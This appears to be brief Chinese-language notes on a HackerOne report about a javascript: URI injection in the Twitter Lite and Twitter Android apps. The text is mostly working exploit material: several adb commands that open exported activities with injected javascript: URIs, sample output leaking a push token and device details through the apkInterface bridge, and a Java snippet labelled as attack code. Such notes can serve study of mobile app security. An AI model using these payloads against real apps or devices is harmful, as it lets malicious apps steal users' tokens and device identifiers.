看hackerone上的报告关于安卓app上记录的

adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:Object.getOwnPropertyNames(window).forEach(function(v%2C%20x)%20%7B%20document.writeln(v)%3B%20%7D)%3B”

adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:document.write(apkInterface.getApkPushParams())%3B”

{“payload”:{“client_application_id”:14191373,”push_device_info”:{“env”:3,”locale”:”en-IN”,”os_version”:”24”,”token”:”Removed-XIHCvjwARIg8FL8TYxwJZL- TeN4caodfWnpXvV-Removed-UcglqNuRCuM13MHbDQVRgR”,”udid”:”800a1bbb36e7192d”}},”headers”:{“x-twitter-client-version”:”apk.2.1.0–25”}}

设备信息

javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());:

{“aid”:”bf49d6c0-1fec-492f-95af-b81dbf680350”,”limit_ad_tracking”:0,”country_code”:”IN”,”dev_brand”:”xiaomi”,”dev_model”:”Redmi Note 4”,”dev_carrier”:”Jio 4G”,”lang”:”English”,”os_ver”:24,”ts”:1551107789748,”os_name”:”android”,”action”:”open”,”ref”:”javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());”}

adb shell am start -n com.twitter.android/androidx.compose.ui.tooling.preview.PreviewActivity -d “javascript://example.com%0A alert(1);”

adb shell am start -n com.twitter.android/androidx.compose.ui.tooling.preview.PreviewActivity -d “file:///sdcard/xx.html”

攻击代码

Intent intent = new Intent(); intent.setClassName(“com.twitter.android.lite”, “com.twitter.android.lite.TwitterLiteActivity”); intent.setData(Uri.parse(“javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());”)); startActivity(intent);